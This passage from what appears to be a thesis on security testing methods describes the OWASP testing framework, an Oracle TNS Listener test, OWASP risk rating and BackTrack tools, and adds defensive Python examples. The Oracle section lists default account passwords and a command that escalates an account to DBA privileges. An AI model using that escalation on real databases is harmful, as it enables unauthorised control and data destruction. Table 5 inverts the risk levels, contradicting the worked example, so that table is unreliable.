Manual inspections are human-driven assessments, such as examining the security implications of people, policies and processes. They can also include inspection of technology decisions such as architectural design. They are usually carried out by analyzing documentation or by interviewing the designers or owners of the system. OWASP rates this as the most powerful and effective technique.
Threat modeling.
[Figure 9 diagram residue; the labels recoverable from the figure are: "Patch installed on all affected systems", "Patch widely known", "Patch released", "Security tools updated", "Risk level" (vertical axis), "Time" (horizontal axis), "Vulnerability discovered", "Vulnerability disclosed publicly", "Vulnerability known to the vendor", "Vendor notifies customers"]
Threat modeling has become a popular technique that helps system designers think about the security threats their system or application may face. OWASP recommends a simple approach following the NIST 800-30 risk assessment standard [i16].
Source code review.
Source code review is the process of manually checking the source code of a web application for security issues. With the source code, a tester can determine exactly what is happening (or is supposed to happen) and remove the guesswork of black-box testing. Source code analysis can also be extremely efficient for finding implementation issues, such as places where input validation is not performed or where control procedures fail open.
Penetration testing.
Penetration testing is a popular technique that has been used for network security testing for many years. It is also commonly called black-box testing or ethical hacking. Penetration testing is essentially the art of testing a running application remotely, without knowing the inner workings of the application itself, in order to find security vulnerabilities. For OWASP, penetration testing is not the most important testing technique; it must come last, once the application has been built and deployed as a product. OWASP holds that penetration testing has proven effective in network security, but that this technique does not naturally carry over to application security testing.
In short, although most of the guide is devoted to web application penetration testing, the OWASP project does not regard it as the main or the only technique for testing web applications. The point at which it is used in the SDLC is shown in the figure below, which presents a typical representative proportion of the testing techniques (Figure 9):
Figure 10: Testing techniques applied across the SDLC phases
2.3.4. The OWASP testing framework
This is regarded as a reference working model consisting of the techniques and tasks appropriate to the different phases of the SDLC. Companies and project teams can use this model to develop their own testing framework and to make use of testing services from vendors. The framework should not be seen as prescriptive but as a flexible approach that can be extended and molded to fit an organization's development process and culture.
There are many software development methodologies, such as the Rational Unified Process, eXtreme and Agile, and the traditional waterfall method. The aim of this model is neither to build on one particular methodology nor to provide specific guidance for following any particular one. Instead it presents only a generic development model with emphasis on security testing, which the reader should adapt, case by case, to fit the company's process.
Phase 1: Before development begins.
Before application development begins:
Check that an adequate SDLC with security built in is in place.
[Figure 10 diagram residue; labels recoverable from the figure: testing techniques "Manual inspections and reviews", "Source code review", "Penetration testing"; SDLC phases "Requirements gathering and analysis", "design", "development", "deployment", "maintenance"; axis titles "SDLC phases" and "Corresponding testing phases"]
Check that the policies and standards set for the development team are appropriate.
Develop measurement and metrics criteria.
Phase 1A: Review policies and standards.
Ensure that appropriate policies, standards and documentation are in place. Documentation is extremely important, because it gives the development team guidelines and policies they can follow.
Phase 1B: Develop measurement and metrics criteria.
Before development begins, plan the measurement program. It is essential to define the metrics before development begins, since it may be necessary to modify the process in order to capture the data.
Phase 2: Definition and design
Phase 2A: Review security requirements
Security requirements define how an application works from a security perspective. It is essential that the security requirements are tested. Testing in this case means examining the assumptions made in the requirements and testing whether there are gaps in the requirements definition.
Phase 2B: Review design and architecture
Applications should have a documented design and architecture. It is essential to test these documents to ensure that the design and architecture enforce the appropriate level of security as defined in the security requirements. Identifying security flaws in the design phase is not only one of the most cost-efficient places to identify defects but also one of the most effective places to make changes. If weaknesses are found, they should be given to the system architect to find alternative approaches.
Phase 2C: Create and review UML models
Use these models to confirm with the system designers an exact understanding of how the application works. If weaknesses are found, they should be given to the system architect to find alternative approaches.
Phase 2D: Create and review threat models
Having reviewed the design and architecture, and with UML models explaining exactly how the system works, undertake a threat modeling exercise. Develop realistic threat scenarios. Analyze the design and architecture to ensure that these threats have been mitigated to a level acceptable to the business requirements. When threats are identified for which there is no mitigation strategy, revisit the design and architecture with the system architect to modify the design.
Phase 3: Development
In theory, development is the implementation of a design. In the real world, however, many design decisions are made during software development. These are smaller decisions that were either too detailed to be described in the design or, in other cases, issues for which no policy or standards guidance was provided. If the design and architecture were not adequate, the developer will face many decisions. If policies and standards were insufficient, the developer will face even more decisions.
Phase 3A: Code walkthroughs
The security team should conduct a walkthrough of the code with the developers and, in some cases, the system architects, in order to gain a high-level understanding of the workflow, layout and structure of the source code that makes up the application.
Phase 3B: Code reviews
Armed with a good understanding of how the code is structured and why things are coded the way they are, the tester can examine the actual code for security defects.
In terms of return on the resources invested (mostly time), static code review produces higher quality results than any other security assessment method and relies less on the skill of the tester. However, on its own it does not resolve every problem; it must be considered carefully within a full testing regime.
Phase 4: Deployment
Phase 4A: Application penetration testing
After testing the requirements, analyzing the design and performing code review, it might be assumed that all issues have been caught. Hopefully this is the case, but penetration testing the application after it has been deployed provides a final check to ensure that nothing has been missed.
Phase 4B: Configuration management testing
Application penetration testing should include checking how the infrastructure was deployed and secured. While the application may be secure, a small aspect of the configuration could still be an exploitable vulnerability.
Phase 5: Maintenance and operations
Phase 5A: Conduct operational management reviews
There needs to be a process detailing how the operational side of both the application and the infrastructure is managed.
Phase 5B: Conduct periodic health checks
Monthly or quarterly health checks should be performed on both the application and the infrastructure to ensure that no new security risks have been introduced and that the level of security is still intact.
Phase 5C: Ensure change verification
After every change has been approved and tested in the QA environment and deployed into the production environment, it is vital that, as part of the change management process, the change is checked to ensure that the level of security has not been affected by it.
[Figure 11 diagram residue; the phase labels recoverable from the figure are: "Before development", "Definition and design", "Development", "Deployment", "Maintenance"]
Figure 11: Workflow in the OWASP testing framework
2.3.5. OWASP web application penetration testing
According to OWASP, penetration testing will never be an exact science with a complete list of all the issues that should be tested, and penetration testing is only an appropriate technique for security testing web applications under certain circumstances. OWASP's web application penetration testing method is based on a black-box approach: the tester knows nothing, or very little, about the applications being tested. The testing model comprises:
[Figure 11 box labels misplaced here by extraction; the labels recoverable are: "Change verification", "Health checks", "Operational management reviews", "Regression testing", "Penetration testing", "Configuration management review", "Unit and system testing", "Acceptance testing", "Code review", "Code walkthrough", "Unit and system testing", "Requirements review", "Design and architecture review", "Create/review UML models", "SDLC review process", "Policy review", "Standards review", "Create/review threat models", "Trace the source of standard measurement metrics"]
Tester: performs the testing activities.
Tools and methodology: the core is the Testing Guide project [27].
Application: black-box testing
Testing is divided into two phases, corresponding to the passive and active modes:
Phase 1, passive mode: in this mode the tester tries to understand the application's logic. Tools can be used to gather information, for example an HTTP proxy to observe all HTTP requests and responses. At the end of this phase the tester should understand all the access points (gates) of the application (for example HTTP headers, parameters and cookies). The Information Gathering section explains how to perform a passive-mode test. For example, the tester may find the following:
https://www.example.com/login/Authentic_Form.html
This may indicate an authentication form in which the application requests a username and a password. The following parameters represent two access points (gates) to the application:
http://www.example.com/Appx.jsp?a=1&b=1
In this case the application shows two gates (parameters a and b). All gates found in this phase represent a test point. Keeping a spreadsheet with the application's directory tree and all access points will be useful for the second phase.
Phase 2, active mode: in this phase the tester begins testing using the methods described in chapter 4 of the OWASP Testing Guide [27]. OWASP divides the set of active tests into 9 sub-categories with a total of 66 testing guide articles:
Configuration Management Testing.
Business Logic Testing.
Authentication Testing.
Session Management Testing.
Authorization Testing.
Data Validation Testing.
Denial of Service Testing.
Web Services Testing.
Ajax Testing.
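One way to build the spreadsheet of gates that the passive phase calls for, as an added example (this is not code from the OWASP guide or from the thesis): the three requests below are constructed to match the two URLs in the text, and the parsing is limited to what an intercepting proxy hands over (request line, headers, urlencoded body). Every path, query parameter, form field and cookie becomes one row, that is, one test point for the active phase.

```python
"""Entry-point ("gate") inventory from recorded HTTP requests.

Added example for the passive phase: each path, query parameter, form field
and cookie becomes a row of the spreadsheet that the active phase works from.
SAMPLE_REQUESTS is constructed for this example; it is not captured traffic.
"""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: three raw requests as an intercepting HTTP proxy would record them.
SAMPLE_REQUESTS = [
    "GET /login/Authentic_Form.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n\r\n",
    "POST /login/Authentic_Form.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: JSESSIONID=abc123\r\n\r\n"
    "username=alice&password=secret",
    "GET /Appx.jsp?a=1&b=1 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Cookie: JSESSIONID=abc123; theme=dark\r\n\r\n",
]


def parse_request(raw):
    """Split one raw HTTP/1.1 request into method, path and the names of its gates."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    # keep_blank_values so that "?a=&b=1" still reports the gate "a"
    query = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    cookies = [c.split("=", 1)[0].strip()
               for c in headers.get("cookie", "").split(";") if c.strip()]
    body_params = []
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        body_params = [k for k, _ in parse_qsl(body, keep_blank_values=True)]
    return {"method": method, "path": parts.path, "query": query,
            "body": body_params, "cookies": cookies, "headers": sorted(headers)}


def inventory(raw_requests):
    """Merge all requests into {path: {methods, query, body, cookies, headers}}."""
    gates = defaultdict(lambda: {"methods": set(), "query": set(), "body": set(),
                                 "cookies": set(), "headers": set()})
    for raw in raw_requests:
        req = parse_request(raw)
        entry = gates[req["path"]]
        entry["methods"].add(req["method"])
        for kind in ("query", "body", "cookies", "headers"):
            entry[kind].update(req[kind])
    return {path: {k: sorted(v) for k, v in entry.items()} for path, entry in gates.items()}


def to_rows(inv):
    """Flatten the inventory into (path, kind, name) rows: one test point per row.
    Request headers stay in the inventory but are not emitted as rows, because the
    same header names recur on every path and are tested once per application."""
    rows = []
    for path, entry in sorted(inv.items()):
        for kind in ("query", "body", "cookies"):
            rows.extend((path, kind, name) for name in entry[kind])
    return rows


if __name__ == "__main__":
    for path, kind, name in to_rows(inventory(SAMPLE_REQUESTS)):
        print(f"{path}\t{kind}\t{name}")
```

Run against a proxy's saved requests instead of SAMPLE_REQUESTS, the output is the directory tree plus gate list the text describes; the login page yields its two form fields and a session cookie, Appx.jsp its parameters a and b.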
A table listing the testing guide articles appears on page 47 of the OWASP Testing Guide v3.0, in the following form:
Category                  Code           Test name                                          Vulnerability
Information gathering     OWASP-IG-001   Spiders, Robots and Crawlers                       None
                          OWASP-IG-002   Search Engine Discovery / Reconnaissance
                          OWASP-IG-003   Identify application entry points
                          OWASP-IG-004   Testing for Web Application Fingerprint
                          OWASP-IG-005   Application Discovery
                          OWASP-IG-006   Analysis of Error Codes                            Information disclosure
Configuration management  OWASP-CM-001   SSL/TLS Testing (SSL Version, Algorithms,          SSL weakness
                                         Key length, Digital Cert. Validity)
                          OWASP-CM-002   DB Listener Testing
                          OWASP-CM-003   Infrastructure Configuration Management Testing
Table 4: Sample illustrating the testing guide articles
Detailed guidance for each testing guide article is given in full in the OWASP Testing Guide v3.0 [27]. Within the scope of this thesis only one guide is presented as an example, OWASP-CM-002, testing the Oracle database Listener:
Brief description
The Oracle database Listener is a network process of the Oracle database. It waits for connection requests from remote clients. This process can be compromised and can therefore affect the availability of the database.
Description of the issue
The database Listener is the entry point for remote connections to an Oracle database. It listens for connection requests and handles them accordingly. This attack is possible if the tester can reach the service; the test should be performed from the internal network (most Oracle installations are not exposed to the external network). By default the Listener uses port 1521 (port 2483 is the new officially registered port for the TNS Listener and 2484 for the TNS Listener using SSL). Ideally the Listener should be moved from this port to some other arbitrary port. If the Listener is shut down, the database cannot be reached remotely, which amounts to a denial of service attack.
Potential attack areas:
Stopping the Listener, causing a denial of service attack.
Setting a password and preventing others from controlling the Listener.
Writing trace and log files to any file accessible by the owner of the tnslnsr process (usually Oracle), which may leak information.
Obtaining detailed information about the Listeners, the database and the configuration.
Black-box testing and example
Once the port the Listener is running on has been discovered, one can assess the Listener by running a tool developed by Integrigy:
Figure 12: The Integrigy tool
The tool checks the following information:
Listener password. On many Oracle systems the Listener password may not be set. The tool verifies this. If the password is not set, an attacker can set a password and take control of the Listener, although the password can be removed by editing the listener.ora file on the server.
Logging enabled. The tool also checks whether logging is enabled. If it is not, no change to the Listener would be detected, nor would there be a record of it. Furthermore, brute-force attacks against the Listener would not be logged.
Admin restrictions. If admin restrictions are not enabled, the SET command can be used remotely.
Example: if an open TCP port 1521 is found on a server, one can guess that an Oracle Listener is accepting connections from the outside. If the Listener is not protected by an authentication mechanism, or if the credentials can be found easily, this weakness can be exploited to enumerate the Oracle services. For example, using lsnrctl.exe (present in every Oracle 9i installation), one can obtain the following output:
TNSLSNR for 32-bit Windows: Version 9.2.0.4.0 - Production
TNS for 32-bit Windows: Version 9.2.0.4.0 - Production
Oracle Bequeath NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0
Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version
Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4
SID(s): SERVICE_NAME = CONFDATA
SID(s): INSTANCE_NAME = CONFDATA
SID(s): SERVICE_NAME = CONFDATAPDB
SID(s): INSTANCE_NAME = CONFDATA
SID(s): SERVICE_NAME = CONFORGANIZ
SID(s): INSTANCE_NAME = CONFORGANIZ
From this the Oracle SIDs are known. The Oracle Listener allows the default user accounts on the Oracle server to be enumerated:
User name   Password
OUTLN       OUTLN
DBSNMP      DBSNMP
BACKUP      BACKUP
MONITOR     MONITOR
PDB         CHANGE_ON_INSTALL
In this case no account with DBA privileges is found, but the OUTLN and BACKUP accounts hold a basic privilege: EXECUTE ANY PROCEDURE. This means it is possible to execute any procedure, for example the following:
exec dbms_repcat_admin.grant_admin_any_schema('BACKUP');
Executing this command grants the BACKUP account DBA privileges. The user can now interact directly with the database and execute, for example:
select * from session_privs;
The output is shown in the following screenshots:
Figure 13: Obtaining DBA privileges
The user can now perform a great many operations, in particular DELETE ANY TABLE and DROP ANY TABLE.
Default Listener ports: while investigating an Oracle server, the following ports may be discovered. The default ports are:
1521: Default port for the TNS Listener.
1522 1540: Commonly used ports for the TNS Listener
1575: Default port for the Oracle Names Server
1630: Default port for the Oracle Connection Manager client connections
1830: Default port for the Oracle Connection Manager admin connections
2481: Default port for Oracle JServer/Java VM listener
2482: Default port for Oracle JServer/Java VM listener using SSL
2483: New port for the TNS Listener
2484: New port for the TNS Listener using SSL
Gray-box testing and example
Testing the restrictions on the Listener's privileges
It is important to give the Listener the least privilege, so that it cannot read or write files in the database or in the server's memory address space.
The listener.ora file is used to define the properties of the Listener. One should check that the following line is present in the listener.ora file:
ADMIN_RESTRICTIONS_LISTENER=ON
Listener password: many common exploits are carried out because the Listener password is not set. By checking the listener.ora file, one can determine whether a password has been set:
A password can be set manually by editing the listener.ora file. This is done by editing the following entry: PASSWORDS_<listener name>.
The problem with this manual method is that the password is stored in plain text and can be read by anyone who can access the listener.ora file. A safer way is to use the LSNRCTL tool and invoke the change_password command.
LSNRCTL for 32-bit Windows: Version 9.2.0.1.0 - Production on 24-FEB-2004
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> set current_listener listener
Current Listener is listener
LSNRCTL> change_password
Old password:
New password:
Re-enter new password:
Connecting to <ADDRESS>
Password changed for listener
The command completed successfully
LSNRCTL> set password
Password:
The command completed successfully
LSNRCTL> save_config
Connecting to <ADDRESS>
Saved LISTENER configuration parameters.
Listener Parameter File D:\oracle\ora90\network\admin\listener.ora
The command completed successfully
LSNRCTL>
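As an added example of checking these gray-box points from the file itself, without a third-party tool: a small audit of a listener.ora, written for this section and not part of the OWASP guide, the thesis or Integrigy's tool. The two sample files are constructed; the parameter names ADMIN_RESTRICTIONS_<name>, LOGGING_<name> and PASSWORDS_<name> are real listener.ora parameters, while the rule that a value written by lsnrctl change_password looks like a 16-digit hex string (anything else being treated as a hand-edited cleartext password) is an assumption of this example.

```python
"""Audit a listener.ora for the OWASP-CM-002 hardening points.

Added example; not code from the OWASP guide, the thesis or Integrigy.
Checks: ADMIN_RESTRICTIONS_<name>=ON present, a password set and not stored
in cleartext, logging not switched off, and the listener not on a well-known
port. Both sample files below are constructed for this example.
"""
import re

SAMPLE_LISTENER_ORA = """\
# constructed sample: a weak configuration
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example.internal)(PORT = 1521))
    )
  )

PASSWORDS_LISTENER = (oracle)
LOGGING_LISTENER = OFF
"""

HARDENED_LISTENER_ORA = """\
# constructed sample: the same listener after hardening
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example.internal)(PORT = 1599))
    )
  )

ADMIN_RESTRICTIONS_LISTENER = ON
PASSWORDS_LISTENER = (2D6C48F0A1B3C5E7)
LOGGING_LISTENER = ON
"""

# Default listener ports named on the page (1521, 2483, 2484) plus the 1522-1540 range.
WELL_KNOWN_TNS_PORTS = {1521, 2483, 2484} | set(range(1522, 1541))

# Assumption of this example: lsnrctl change_password stores a 16-digit hex value;
# anything else in PASSWORDS_<name> is treated as a hand-edited cleartext password.
HASHED_PASSWORD = re.compile(r"\(?\s*[0-9A-Fa-f]{16}\s*\)?")


def parse_listener_ora(text):
    """Return ({PARAMETER: value}, {ports}) for the top-level NAME = value entries.
    Indented continuation lines are folded into the preceding parameter."""
    params, current = {}, None
    for line in text.splitlines():
        stripped = line.split("#", 1)[0].rstrip()
        if not stripped:
            continue
        m = re.match(r"^([A-Za-z_][A-Za-z0-9_.]*)\s*=\s*(.*)$", stripped)
        if m:
            current = m.group(1).upper()
            params[current] = m.group(2).strip()
        elif current is not None:
            params[current] = (params[current] + " " + stripped.strip()).strip()
    ports = {int(p) for p in re.findall(r"\(\s*PORT\s*=\s*(\d+)\s*\)", text, re.I)}
    return params, ports


def audit(text):
    """Return a list of findings; an empty list means every check passed."""
    params, ports = parse_listener_ora(text)
    findings = []
    # A listener definition is the parameter whose value carries an (ADDRESS ...) block.
    listeners = [name for name, value in params.items() if "(ADDRESS" in value.upper()]
    for name in listeners:
        if params.get(f"ADMIN_RESTRICTIONS_{name}", "").upper() != "ON":
            findings.append(f"{name}: ADMIN_RESTRICTIONS_{name}=ON missing; remote SET commands allowed")
        password = params.get(f"PASSWORDS_{name}")
        if password is None:
            findings.append(f"{name}: no listener password set (PASSWORDS_{name} absent)")
        elif not HASHED_PASSWORD.fullmatch(password):
            findings.append(f"{name}: PASSWORDS_{name} holds a cleartext value; set it with lsnrctl change_password")
        if params.get(f"LOGGING_{name}", "ON").upper() == "OFF":
            findings.append(f"{name}: LOGGING_{name} is OFF; listener changes and brute-force attempts leave no log")
    for port in sorted(ports & WELL_KNOWN_TNS_PORTS):
        findings.append(f"listener bound to well-known TNS port {port}")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", SAMPLE_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        print(f"{label}: {len(audit(text))} finding(s)")
        for finding in audit(text):
            print("  -", finding)
```

The weak sample produces four findings (no admin restrictions, cleartext password, logging off, default port 1521); the hardened sample produces none. Logging is treated as on when LOGGING_<name> is absent, which is Oracle's default for that parameter.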
References
Whitepapers
Oracle Database Listener Security Guide - http://www.integrigy.com/security-resources/whitepapers/Integrigy_Oracle_Listener_TNS_Security.pdf
Tools
TNS Listener tool (Perl) - http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html
Toad for Oracle - http://www.quest.com/toad
2.3.6. Guidance on producing a real risk assessment report
In this part OWASP builds a risk rating method based on the likelihood and impact of each threat, together with a way of presenting the report. OWASP's idea is to build a basic framework which users should customize to fit their organization.
OWASP's approach is based on standard methods, customized for application security. First comes the standard risk model:
Risk = Likelihood * Impact
The OWASP method proposes analyzing the factors that make up likelihood and impact for application security and shows how to combine them to determine the overall risk severity. It consists of the following steps:
Step 1: Identify a risk
Identify which security risk needs to be rated. Among the threat agents, choose the worst case, the one that leads to the highest overall risk.
Step 2: Factors for estimating likelihood
These comprise two groups of factors: threat agent factors and vulnerability factors. The threat agent factors are: skill level, motive, opportunity and size. The vulnerability factors are: ease of discovery, ease of exploit, awareness and intrusion detection. These 8 factors are each scored from 0 to 9, as described in detail on page 327 of [27].
Step 3: Factors for estimating impact
These also comprise two groups, technical impact and business impact (the business impact result is preferred for rating the risk). Technical impact consists of: loss of confidentiality, loss of integrity, loss of availability and loss of accountability. Business impact consists of: financial damage, reputation damage, non-compliance and privacy violation. These 8 criteria are also scored from 0 to 9, according to the criteria described in detail on page 328 of [27].
Step 4: Determine the severity of the risk
Once the figures from steps 2 and 3 are available, compute the average score for each. From the average, the level is read off the following table:
Likelihood and impact levels
0 to <3    High
3 to <6    Medium
6 to 9     Low
Table 5: Determining the risk level
The following example shows how the overall likelihood and impact are calculated:
Threat agent factors                                  Vulnerability factors
Skill level   Motive   Opportunity   Size             Ease of discovery   Ease of exploit   Awareness   Intrusion detection
5             2        7             1                3                   6                 9           2
Overall likelihood = 4.375 (MEDIUM)
Table 6: Overall likelihood calculation
Technical impact                                                                        Business impact
Loss of confidentiality   Loss of integrity   Loss of availability   Loss of accountability   Financial damage   Reputation damage   Non-compliance   Privacy violation
9                         7                   5                      8                        1                  2                   1                5
Overall technical impact = 7.25 (HIGH)
Overall business impact = 2.25 (LOW)
Table 7: Overall impact calculation
Applying the two tables above to the overall risk severity table, we can determine, for the technical impact, whether the severity is Critical, High, Medium, Low or Note.
Overall risk severity
Impact       HIGH       Medium     High       Critical
             MEDIUM     Low        Medium     High
             LOW        Note       Low        Medium
Likelihood              HIGH       MEDIUM     LOW
Table 8: Overall risk severity calculation
As stated above, the overall risk severity computed from the business impact takes precedence. Continuing the example: likelihood is Medium and technical impact is High, so from a purely technical standpoint the overall level is High. However, the business impact is actually Low, so the overall level is best described as Low. This is why understanding the business context of a vulnerability is considered very important for making good risk decisions. In many organizations today, failure to understand this context can lead to a lack of trust and to conflict between the business and security teams.
Step 5: Decide what to fix
From the overall risk rating obtained in step 4, the most severe risks are fixed first.
Step 6: Customize your risk rating model
Customizing the model to each business is very important. Factors that matter to one's own organization can be added, such as the window of opportunity for the attacker or the complexity of the encryption algorithm; alternatively the options can be adjusted or weights assigned to the factors.
Finally, there is guidance on writing the report. It should contain sections such as: Executive summary; Technical management overview; Assessment findings (including a table of the tests performed together with results, solutions, and so on); and Toolbox (listing the tools used for testing).
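The six steps carried through in code, as an added example (this is not code from the OWASP guide or from the thesis): the factor scores are the ones in Tables 6 and 7; the level thresholds are OWASP's standard 0 to <3 LOW, 3 to <6 MEDIUM, 6 to 9 HIGH, which is the mapping the worked example follows (4.375 is MEDIUM, 7.25 HIGH, 2.25 LOW); the severity matrix is OWASP's, with likelihood LOW, MEDIUM, HIGH from left to right; and the optional weights implement the customization of step 6.

```python
"""OWASP risk rating (Risk = Likelihood * Impact) carried through in code.

Added example, not code from the OWASP guide or the thesis. Scores are the
worked example on the page; thresholds and the severity matrix are OWASP's
standard ones. Weights are optional and serve the step 6 customization.
"""

THREAT_AGENT = ("skill level", "motive", "opportunity", "size")
VULNERABILITY = ("ease of discovery", "ease of exploit", "awareness", "intrusion detection")
TECHNICAL = ("loss of confidentiality", "loss of integrity",
             "loss of availability", "loss of accountability")
BUSINESS = ("financial damage", "reputation damage", "non-compliance", "privacy violation")

# Rows: impact level; columns: likelihood level (LOW, MEDIUM, HIGH left to right).
SEVERITY = {
    "HIGH":   {"LOW": "Medium", "MEDIUM": "High",   "HIGH": "Critical"},
    "MEDIUM": {"LOW": "Low",    "MEDIUM": "Medium", "HIGH": "High"},
    "LOW":    {"LOW": "Note",   "MEDIUM": "Low",    "HIGH": "Medium"},
}


def level(score):
    """Map an average 0..9 score to LOW / MEDIUM / HIGH."""
    if not 0 <= score <= 9:
        raise ValueError(f"score {score} outside 0..9")
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"


def average(names, scores, weights=None):
    """Weighted average of the factor scores; equal weights give OWASP's plain mean."""
    if len(scores) != len(names):
        raise ValueError("one score per factor expected")
    for name, score in zip(names, scores):
        if not 0 <= score <= 9:
            raise ValueError(f"{name}: score {score} outside 0..9")
    w = [1.0] * len(names) if weights is None else [weights.get(n, 1.0) for n in names]
    return sum(s * wi for s, wi in zip(scores, w)) / sum(w)


def rate(threat_agent, vulnerability, technical, business, weights=None):
    """Steps 2-4: likelihood and impact averages, their levels, both overall severities."""
    likelihood = average(THREAT_AGENT + VULNERABILITY,
                         tuple(threat_agent) + tuple(vulnerability), weights)
    tech = average(TECHNICAL, technical, weights)
    biz = average(BUSINESS, business, weights)
    return {
        "likelihood": likelihood, "likelihood_level": level(likelihood),
        "technical_impact": tech, "technical_level": level(tech),
        "business_impact": biz, "business_level": level(biz),
        # severity from the technical view and from the business view; OWASP prefers the latter
        "severity_technical": SEVERITY[level(tech)][level(likelihood)],
        "severity_business": SEVERITY[level(biz)][level(likelihood)],
    }


def prioritize(named_ratings):
    """Step 5: order (name, rating) pairs so the most severe business severity comes first."""
    order = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3, "Note": 4}
    return sorted(named_ratings, key=lambda item: order[item[1]["severity_business"]])


if __name__ == "__main__":
    result = rate((5, 2, 7, 1), (3, 6, 9, 2), (9, 7, 5, 8), (1, 2, 1, 5))
    for key, value in result.items():
        print(f"{key}: {value}")
```

With the page's scores the function returns likelihood 4.375 (MEDIUM), technical impact 7.25 (HIGH) and business impact 2.25 (LOW), giving High from the technical view and Low from the business view, exactly as the text concludes. Passing weights such as {"privacy violation": 3.0} shows the step 6 effect: the same scores then average to a MEDIUM business impact and the risk moves up the priority list.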
2.3.7. Conclusions on the OWASP method
Key features and benefits
OWASP web application security testing ensures that the most common attacks and weaknesses are avoided and that the confidentiality, integrity and availability of a web application are maintained.
The OWASP community has also developed a number of security tools focused on web application testing, both automated and manual. Some of these tools are WebScarab, Wapiti, JBroFuzz and SQLiX, which ship with the BackTrack operating system.
When considering the security assessment of web infrastructure, the OWASP Testing Guide provides specific technology assessment details; for example, the approach to testing Oracle differs considerably from that for MySQL. The guide gives a broader view of working with many technologies, helping the tester choose the most suitable procedures for testing.
It encourages programmers to practice secure coding by integrating security testing into each development phase. This ensures robust, bug-free and secure application products.
It is widely accepted and recognized in the software industry. Each of the top security risks (top 10) can also be linked to other web application security assessment standards, helping an organization's product meet more than one standard at a time with less effort.
2.4. The BackTrack method
This can be regarded as the simplest of the security testing methods presented above. The method concentrates on describing penetration testing techniques and how to use the tools available in BackTrack. The pre-assessment and post-assessment phases are not covered. In the BackTrack method, penetration testing is carried out through at most the following ten steps.
2.4.1. Target scoping
Before starting the technical security assessment it is important to observe and understand the scope of the target network environment. Knowing the scope defines which entity or entities are involved: what is to be tested, how it is to be tested, what conditions apply during the test, what limits the test, how long the test takes, and what business objectives are to be achieved. In this phase the tester must also be aware of the technologies in use, their basic functions and how they interact with the network environment. The tester's knowledge is therefore a significant contribution to any kind of security assessment.
2.4.2. Information gathering
In this phase the penetration tester uses public resources to learn more about the target. This information can be obtained from third-party sources on the Internet: forums, bulletin boards, newsgroups, articles, blogs, social networks, etc. Data can also be gathered through the various search engines such as Google, Yahoo and Bing; this technique is commonly called passive gathering. Active techniques typically use tools that mine data to gather information via DNS, routers, ICMP ping, Whois databases, e-mail, phone numbers, personal information and user accounts. Tools characteristic of each information gathering technique, with example commands, are:
Metagoofil (finds pdf, doc and ppt documents on the target website; run the following on the command line: # ./metagoofil.py). Dnswalk (finds names and IP addresses stored in the target DNS server; run # ./dnswalk). Dmitry (multi-purpose tool that finds many kinds of information; # dmitry). Maltego (graphical tool that makes gathering and presenting information convenient).
2.4.3. Target discovery
This phase mainly determines the state of the network, the target OS and its relative network architecture. This provides a complete picture of the current technology or devices connected inside, and can help in further enumerating the various services running on the network. Network tools from BackTrack are used to identify the hosts that are up, the operating systems on those hosts, and to characterize each device by its role in the network. These tools usually perform active and passive discovery techniques, in two main groups: finding live hosts, and OS fingerprinting to determine the type and version of the OS installed on those hosts. Commonly used tools are:
Finding live hosts: ping, arping (uses ARP requests), fping (pings many IP addresses at once), genlist (pings a whole network; the result is the hosts that answer the ICMP request).
OS fingerprinting: p0f (passive probing by analyzing TCP packets), xprobe2 (active probing with a fuzzy signature technique).
2.4.4. Enumerating targets
This phase uses the host information from the previous phase and finds the open ports on the target systems. Once the open ports are identified, the running services can be enumerated. Using port scanning techniques such as full-open, half-open and stealth scans, a scanner can help identify open ports even when the host is behind a firewall or an IDS. Mapping services to open ports supports further investigation of vulnerabilities that may exist in the target network infrastructure. This phase is therefore considered the basis for the search for security vulnerabilities in the various network devices, which may lead to deeper intrusion. The tester can use several automated tools in BackTrack to achieve the goals of this phase. Characteristic tools are:
AutoScan and Netifera (graphical, easy-to-use tools), nmap (a powerful tool for identifying hosts on the network as well as guessing the OS, often called the Swiss army knife of network security), zenmap (the graphical interface for nmap), amap (checks which application is running on an open port), httprint (identifies the software and version running on a web server), ike-scan (finds and verifies VPN services).
2.4.5. Vulnerability mapping
The previous phases gathered complete information about the target network. Now it is time to locate and analyze vulnerabilities based on the known ports and services. This can be done with a number of the automated network and application vulnerability assessment tools in the BackTrack OS. It can also be done manually, but that takes much more time and requires expert knowledge. Combining both approaches, however, lets the tester see clearly and carefully where any known or unknown vulnerability may exist on the system. The main tools used in this phase are:
